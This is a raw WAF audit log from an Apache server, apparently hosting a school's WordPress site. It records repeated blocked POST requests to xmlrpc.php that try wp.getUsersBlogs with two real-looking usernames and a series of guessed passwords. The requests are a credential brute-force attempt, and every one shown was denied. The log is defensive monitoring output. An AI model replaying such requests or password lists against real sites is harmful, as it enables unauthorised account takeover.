[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (140+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1744778515135332 4289 (- - -) Stopwatch2: 1744778515135332 4289; combined=3249, p1=346, p2=2735, p3=0, p4=0, p5=98, sr=78, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5cfad657-Z-- --bb021b37-A-- [16/Apr/2025:11:42:55 +0700] Z_81Txk9XPLR9cFiTEvFmwAAAAQ 103.236.140.4 42040 103.236.140.4 8181 --bb021b37-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.90.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.90.195 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --bb021b37-C-- wp.getUsersBlogs kajur trustno1 --bb021b37-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bb021b37-E-- --bb021b37-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (136+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1744778575320732 4264 (- - -) Stopwatch2: 1744778575320732 4264; combined=3243, p1=358, p2=2702, p3=0, p4=0, p5=106, sr=83, sw=77, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bb021b37-Z-- --73262517-A-- [16/Apr/2025:11:43:55 +0700] Z_81i0-sESiKFppgz04fYQAAAMo 103.236.140.4 42340 103.236.140.4 8181 --73262517-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.90.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.90.195 X-Forwarded-Proto: http Connection: close Content-Length: 217 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --73262517-C-- wp.getUsersBlogs kajur 123asd --73262517-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --73262517-E-- --73262517-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (149+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1744778635035556 4844 (- - -) Stopwatch2: 1744778635035556 4844; combined=3591, p1=397, p2=3010, p3=0, p4=0, p5=106, sr=84, sw=78, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --73262517-Z-- --66ec3b58-A-- [16/Apr/2025:11:44:55 +0700] Z_81x0-sESiKFppgz04f1AAAAMk 103.236.140.4 42646 103.236.140.4 8181 --66ec3b58-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.90.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.90.195 X-Forwarded-Proto: http Connection: close Content-Length: 222 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --66ec3b58-C-- wp.getUsersBlogs kajur 123@QWE@POI --66ec3b58-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --66ec3b58-E-- --66ec3b58-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (148+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1744778695172226 3924 (- - -) Stopwatch2: 1744778695172226 3924; combined=2968, p1=341, p2=2475, p3=0, p4=0, p5=88, sr=79, sw=64, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --66ec3b58-Z-- --c1fdb851-A-- [16/Apr/2025:11:45:41 +0700] Z_819ZVnVduWmh0dMDMYHgAAAII 103.236.140.4 42872 103.236.140.4 8181 --c1fdb851-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.90.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.90.195 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --c1fdb851-C-- wp.getUsersBlogs kajur 1234%^&* --c1fdb851-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c1fdb851-E-- --c1fdb851-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. 
This is not a false positive.||smkn22-jkt.sch.id|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1744778741662940 4211 (- - -) Stopwatch2: 1744778741662940 4211; combined=3242, p1=390, p2=2684, p3=0, p4=0, p5=99, sr=79, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c1fdb851-Z-- --d830b803-A-- [16/Apr/2025:11:45:55 +0700] Z_82A5VnVduWmh0dMDMYOwAAAIE 103.236.140.4 42930 103.236.140.4 8181 --d830b803-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.90.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.90.195 X-Forwarded-Proto: http Connection: close Content-Length: 220 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --d830b803-C-- wp.getUsersBlogs kajur P@ssw0rd3 --d830b803-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d830b803-E-- --d830b803-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (139+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1744778755086836 4406 (- - -) Stopwatch2: 1744778755086836 4406; combined=3299, p1=345, p2=2761, p3=0, p4=0, p5=109, sr=77, sw=84, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d830b803-Z-- --93c59e5f-A-- [16/Apr/2025:11:46:55 +0700] Z_82Pype92T0H9-Aa0y-LwAAAEI 103.236.140.4 43236 103.236.140.4 8181 --93c59e5f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.90.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.90.195 X-Forwarded-Proto: http Connection: close Content-Length: 217 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --93c59e5f-C-- wp.getUsersBlogs kajur nathan --93c59e5f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --93c59e5f-E-- --93c59e5f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (147+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1744778815131981 4666 (- - -) Stopwatch2: 1744778815131981 4666; combined=3619, p1=382, p2=2903, p3=0, p4=0, p5=180, sr=79, sw=154, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --93c59e5f-Z-- --b013eb37-A-- [16/Apr/2025:11:47:55 +0700] Z_82e5VnVduWmh0dMDMYkAAAAJI 103.236.140.4 43524 103.236.140.4 8181 --b013eb37-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.90.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.90.195 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --b013eb37-C-- wp.getUsersBlogs kajur rangers1 --b013eb37-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b013eb37-E-- --b013eb37-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (140+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1744778875071470 4095 (- - -) Stopwatch2: 1744778875071470 4095; combined=3163, p1=354, p2=2627, p3=0, p4=0, p5=103, sr=83, sw=79, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b013eb37-Z-- --411ea83a-A-- [16/Apr/2025:11:48:55 +0700] Z_82type92T0H9-Aa0y-iQAAAFM 103.236.140.4 43806 103.236.140.4 8181 --411ea83a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.90.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.90.195 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --411ea83a-C-- wp.getUsersBlogs kesiswaan 000000 --411ea83a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --411ea83a-E-- --411ea83a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (140+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1744778935141249 4257 (- - -) Stopwatch2: 1744778935141249 4257; combined=3256, p1=343, p2=2749, p3=0, p4=0, p5=96, sr=79, sw=68, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --411ea83a-Z-- --4221235d-A-- [16/Apr/2025:11:49:55 +0700] Z_8285VnVduWmh0dMDMY9QAAAII 103.236.140.4 44120 103.236.140.4 8181 --4221235d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.90.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.90.195 X-Forwarded-Proto: http Connection: close Content-Length: 232 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --4221235d-C-- wp.getUsersBlogs kesiswaan kesiswaanPassword --4221235d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4221235d-E-- --4221235d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (146+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1744778995070738 4334 (- - -) Stopwatch2: 1744778995070738 4334; combined=3325, p1=354, p2=2804, p3=0, p4=0, p5=97, sr=82, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4221235d-Z-- --ffd3987f-A-- [16/Apr/2025:11:50:55 +0700] Z_83L5VnVduWmh0dMDMZJgAAAJQ 103.236.140.4 44416 103.236.140.4 8181 --ffd3987f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.90.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.90.195 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --ffd3987f-C-- wp.getUsersBlogs kesiswaan 123789 --ffd3987f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ffd3987f-E-- --ffd3987f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (147+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1744779055035012 4685 (- - -) Stopwatch2: 1744779055035012 4685; combined=3474, p1=391, p2=2883, p3=0, p4=0, p5=113, sr=111, sw=87, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ffd3987f-Z-- --012f4467-A-- [16/Apr/2025:11:51:55 +0700] Z_83aype92T0H9-Aa0y_UQAAAEc 103.236.140.4 44732 103.236.140.4 8181 --012f4467-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.90.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.90.195 X-Forwarded-Proto: http Connection: close Content-Length: 225 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --012f4467-C-- wp.getUsersBlogs kesiswaan user123456 --012f4467-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --012f4467-E-- --012f4467-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (152+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1744779115122257 4255 (- - -) Stopwatch2: 1744779115122257 4255; combined=3215, p1=355, p2=2693, p3=0, p4=0, p5=97, sr=78, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --012f4467-Z-- --e301dc19-A-- [16/Apr/2025:11:52:40 +0700] Z_83mJVnVduWmh0dMDMZhwAAAIA 103.236.140.4 44944 103.236.140.4 8181 --e301dc19-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.90.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.90.195 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --e301dc19-C-- wp.getUsersBlogs kesiswaan 1234%^&* --e301dc19-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e301dc19-E-- --e301dc19-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. 
This is not a false positive.||smkn22-jkt.sch.id|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1744779160413721 4229 (- - -) Stopwatch2: 1744779160413721 4229; combined=3271, p1=340, p2=2765, p3=0, p4=0, p5=98, sr=76, sw=68, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e301dc19-Z-- --55a9167e-A-- [16/Apr/2025:11:52:55 +0700] Z_83p5VnVduWmh0dMDMZkAAAAIo 103.236.140.4 45018 103.236.140.4 8181 --55a9167e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.90.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.90.195 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --55a9167e-C-- wp.getUsersBlogs kesiswaan z1x2c3v4 --55a9167e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --55a9167e-E-- --55a9167e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (140+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1744779175343713 4359 (- - -) Stopwatch2: 1744779175343713 4359; combined=3393, p1=357, p2=2834, p3=0, p4=0, p5=115, sr=82, sw=87, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --55a9167e-Z-- --c630b37d-A-- [16/Apr/2025:11:53:55 +0700] Z_834ype92T0H9-Aa0y_zwAAAEs 103.236.140.4 45328 103.236.140.4 8181 --c630b37d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.90.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.90.195 X-Forwarded-Proto: http Connection: close Content-Length: 225 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --c630b37d-C-- wp.getUsersBlogs kesiswaan tinkerbell --c630b37d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c630b37d-E-- --c630b37d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (143+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1744779235186020 4278 (- - -) Stopwatch2: 1744779235186020 4278; combined=3335, p1=372, p2=2797, p3=0, p4=0, p5=96, sr=96, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c630b37d-Z-- --79f82506-A-- [16/Apr/2025:11:54:55 +0700] Z_84Hxk9XPLR9cFiTEvG2wAAABI 103.236.140.4 45658 103.236.140.4 8181 --79f82506-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.90.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.90.195 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --79f82506-C-- wp.getUsersBlogs kesiswaan bonnie --79f82506-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --79f82506-E-- --79f82506-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (154+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1744779295263293 4356 (- - -) Stopwatch2: 1744779295263293 4356; combined=3341, p1=351, p2=2766, p3=0, p4=0, p5=155, sr=84, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --79f82506-Z-- --9b85fe03-A-- [16/Apr/2025:11:55:55 +0700] Z_84W5VnVduWmh0dMDMaEgAAAJU 103.236.140.4 45990 103.236.140.4 